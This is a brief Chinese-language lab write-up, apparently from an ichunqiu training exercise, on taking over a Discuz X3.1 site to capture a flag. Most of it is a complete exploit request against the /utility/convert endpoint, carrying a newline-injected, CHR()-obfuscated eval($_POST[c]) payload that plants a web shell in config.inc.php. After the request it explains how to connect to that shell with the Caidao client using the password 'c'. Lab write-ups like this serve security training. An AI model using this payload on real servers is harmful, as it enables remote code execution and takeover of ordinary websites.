实验环境:winxp
实验工具:brupsuite,caidao
目的:得到www.test.ichunqiu的服务器权限
打开实验,打开web看到是dz,根据dz的版本去网上搜一下漏洞,找到一个dz x3.1的漏洞
接下来打开www.test.ichunqiu/utility/convert,配置网络代理
然后用brup抓包,直接使用EXP
POST /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1 Host: www.test.ichunqiu User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Length: 199 Content-Type: application/x-www-form-urlencoded newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes
然后直接用菜刀连接www.test.ichunqiu/utility/convert/data/config.inc.php 密码为c 连接即可
拿到flag